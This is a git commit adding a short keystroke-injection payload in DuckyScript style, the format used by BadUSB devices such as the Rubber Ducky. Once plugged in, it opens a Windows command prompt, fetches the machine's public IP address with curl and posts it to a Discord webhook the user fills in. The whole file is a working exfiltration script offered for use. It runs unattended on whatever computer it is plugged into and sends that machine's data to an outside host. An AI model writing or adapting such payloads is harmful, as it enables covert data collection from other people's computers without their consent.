windows: post curl ip to discord webhook

This commit is contained in:
rintyuu 2024-04-05 21:54:28 -07:00
parent 6254d9a17e
commit b124549e75

15
pull-ip-discord.txt Normal file
View file

@ -0,0 +1,15 @@
REM replace "YOUR_DISCORD_WEBHOOK_URL" in line 13 to your own discord webhook. to be run on windows systems.
DELAY 1000
GUI r
DELAY 500
STRING cmd
DELAY 500
ENTER
DELAY 1000
STRING curl ipv4.icanhazip.com > temp.txt
DELAY 500
ENTER
DELAY 1000
STRING set /p IP=<temp.txt & curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"Current IP Address: %IP%\"}" YOUR_DISCORD_WEBHOOK_URL
DELAY 500
ENTER